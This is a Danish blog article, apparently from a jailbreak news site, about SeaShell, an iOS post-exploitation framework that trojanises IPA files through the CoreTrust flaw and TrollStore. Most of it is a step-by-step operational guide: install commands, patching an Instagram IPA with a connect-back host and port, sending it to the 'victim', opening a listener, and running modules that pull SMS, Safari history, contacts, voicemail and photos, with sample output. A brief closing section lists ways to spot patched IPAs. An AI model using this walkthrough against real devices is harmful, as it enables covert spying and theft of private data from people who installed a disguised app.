SeaShell Trojansk Hest til iOS

Mange brugere opfatter CoreTrust-fejlen, der bruges af TrollStore IPA-installationsprogrammet, som en praktisk funktion, der letter installationen af apps og justeringer permanent uden begrænsninger fra nogen kilde på iPhones, der kører iOS 14, iOS 15 og iOS 16. Den rummer dog et mørkere potentiale, fordi den kan udnyttes til at overtage kontrollen over din iPhone i hemmelighed, hvilket muliggør skjult spionage på din enhed uden din viden.

Hvad er en muslingeskal?

SeaShell er et framework designet til at patche en IPA-fil til TrollStore eller Esign, hvilket muliggør injektion af malware. Denne skadelige software muliggør fjernforbindelse til den målrettede enhed og omdanner den effektivt til en trojansk hest på et intetanende offers iPhone eller iPad. Ved at udnytte CoreTrust-fejlen opererer SeaShell i al hemmelighed, hvilket udgør betydelige sikkerhedsrisici for brugerne. Patched IPA skal installeres sammen med TrollStore eller TrollStore 2.

iOS-frameworket efter udnyttelse, kendt som SeaShell, giver brugerne mulighed for at få fjernadgang til, manipulere og udtrække data fra målrettede enheder. Med sin alsidige arkitektur kan brugerne nemt udvikle brugerdefinerede moduler, der er skræddersyet til specifikke opgaver. SeaShell leveres dog præudstyret med flere vigtige moduler, der er designet til problemfrit at udtrække følsomme oplysninger. Derudover kan du patche IPA'en med Trojan Horse.

For at starte processen skal der blot genereres en modificeret IPA-fil, som derefter kan installeres på målenheden via kanaler som TrollStore eller andre IPA-installationer, der kan omgå CoreTrust-begrænsninger. Når applikationen er installeret, skal målenheden blot starte appen én gang og lukke den.

Blandt funktionerne tilbyder SeaShell moduler til udtrækning af kritiske datapunkter. For eksempel kan brugerne udnytte et modul til at hente detaljerede kontaktoplysninger, der er gemt i filen AddressBook.sqlitedb. Derudover kan brugerne se systemoplysninger såsom enhed og installeret iOS-firmware og downloade billeder, der er tilgængelige på enheden eller i iCloud.

Derudover letter SeaShell udforskningen af Safari-bogmærker og browserhistorik, hvilket giver brugerne mulighed for at dykke ned i den pågældende enheds digitale fodaftryk. Denne funktion muliggør udtrækning og lagring af browserdata i et praktisk JSON-format til analyse.

Derudover indeholder rammeværket moduler dedikeret til adgang til Voicemail-data fra voicemail.db-filen, hvilket giver indsigt i kommunikationsmønstre og interaktioner. Derudover tilbyder SeaShell funktionalitet til at downloade eller se SMS-data, hvilket gør det muligt for brugerne at overvåge og analysere udvekslinger af tekstbeskeder og dermed potentielt afsløre værdifuld indsigt eller bevismateriale.

Kort sagt tilbyder SeaShell ikke kun en fleksibel platform til udvikling af brugerdefinerede moduler, men inkluderer også et sæt præbyggede værktøjer, der har til formål at udtrække følsomme oplysninger fra iOS-enheder.

Bemærk: SeaShell kræver, at brugerne downloader en modificeret IPA-fil, sideloader den på enheden med TrollStore og kører den mindst én gang for at kompromittere enheden.

Denne omfattende pakke af funktioner understreger frameworkets effektivitet i scenarier efter udnyttelse og fremhæver dets potentiale til både legitime og ondsindede formål.

SeaShell kan prale af en utrolig potent funktion: muligheden for at koble sig til forskellige applikationer, herunder, men ikke begrænset til, Contacts.app. Gennem denne funktionalitet får brugerne hidtil uset kontrol, der gør det muligt for dem at erstatte systemapps, dykke ned i app-containere, tilføje nye processer, opdatere eksekverbare filer, ændre eksekverbare tilladelser, uploade programrettelser og meget mere. Der er også en indbygget mulighed for at styre offerets afspiller med muligheder som stop, afspil, næste osv.

Denne funktion giver brugerne mulighed for at flytte den trojanske hest til iOS til forskellige apps, herunder systemapps som Lommeregner, Kontakter osv.

Potentialet for udnyttelse kender ingen grænser, da SeaShell tilbyder en bred vifte af muligheder for sofistikerede angreb og manipulationer. SeaShell udnytter de formidable muligheder i en avanceret nyttelast kendt som Pwny, kendt for sin overflod af funktioner designet til at muliggøre komplicerede udnyttelsestaktikker. Med Pwny i centrum tilbyder SeaShell brugerne et robust framework til at udføre sofistikerede manøvrer inden for cybersikkerhed.

Sådan installeres SeaShell

SeaShell er et Python-script, der nemt kan installeres via pip-pakkehåndteringen. For at konfigurere SeaShell Framework skal du blot indtaste følgende kommando i din terminal:

 pip3 install git+https://github.com/EntySec/SeaShell

Pwny er en implementering af en avanceret nyttelast skrevet i ren C og designet til bærbarhed og udvidelsesmuligheder for iOS-enheder. Brug følgende kommando til at installere pwny:

 pip3 install git+https://github.com/EntySec/HatSploit

Sådan bruger du SeaShell Framework

SeaShell bruger sin applikationspakke, der består af en simpel eksekverbar fil sammen med en anden eksekverbar fil, der er ansvarlig for at starte Pwny-nyttelasten. Dette værktøj gør det muligt for brugerne at ændre enhver IPA-fil, f.eks. ved at opdatere den justerede Instagram IPA med den trojanske hest. Der er også en mulighed for at oprette en IPA-fil, der indeholder malwaren, med et falsk navn og ikon.

Trin 1. Åbn terminalappen og udfør seashell-kommandoen for at køre frameworket.

 seashell

Trin 2. Opret en IPA-fil og angiv din IP-adresse og port til forbindelsen.

(seashell)> ipa patch Instagram.ipa 
Host to connect back: 192.168.0.1 
Port to connect back: 8888 
IPA at Instagram.ipa patched.

Trin 3. Send IPA'en til offeret til installation via TrollStore.

Trin 4. Åbn lytteren på din computer, og vent på forbindelsen.

 (seashell)> listener on 0.0.0.0:8888

Trin 5. Efter oprettelse af forbindelse skal du køre moduler, f.eks. safari_history, player, sysinfo, sms, devices, ipa, voicemail, photos, safari_bookmarks, contacts osv.

 pwny:/ root# safari_history History.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s History.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing history database... History: Date URL ---- --- 2024-02-28 09:35:57 https://onejailbreak.com pwny:/ root#

For at give adgang til SMS-data kan du liste de chats, der findes i SMS-appen, ved hjælp af kommandoen sms -l eller udtrække chathistorikken med en specifik kontakt med sms .

 pwny:/ root# sms 123456789 sms.db |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s sms.db-wal |███████████████████████████████████████▌| ▁▃▅ 305/305 [100%] in 1s [*] Parsing SMS for 123456789... Sms (11111111111): ID Date Status Text -- ---- ------ ---- 1 2024-02-28 11:01:21 Sent Vist ONEJailbreak.com pwny:/ root#

Sådan opdager du den trojanske hest fra Seashell

For at mindske risikoen for at blive offer for angreb via SeaShell-frameworket kan du følge nogle forslag til, hvordan du registrerer standardkonfigurationen af SeaShell-patchede IPA-filer. Projektet er dog open source og kan nemt ændres for at ændre værdierne til brugerdefinerede.

1. Udpak den IPA-fil, du vil installere.
2. Undersøg app-pakken for en eksekverbar fil kaldet "mussel", som fungerer som en repræsentation af Pwny-nyttelasten.
3. Undersøg Info.plist-filen, og søg efter "CFBundleBase64Hash", som indeholder et værtspar kodet med base64 (:).
4. Bekræft filens hashsum for at sikre dens integritet, før du fortsætter installationen.

Skrevet af

Kuba Pawlak

Kuba har over 20 års journalistisk erfaring med fokus på jailbreak siden 2012. Han har interviewet professionelle fra forskellige virksomheder. Udover journalistik specialiserer Kuba sig i videoredigering og droneflyvning. Han studerede IT på universitetet før sin forfatterkarriere.

Skriv en kommentar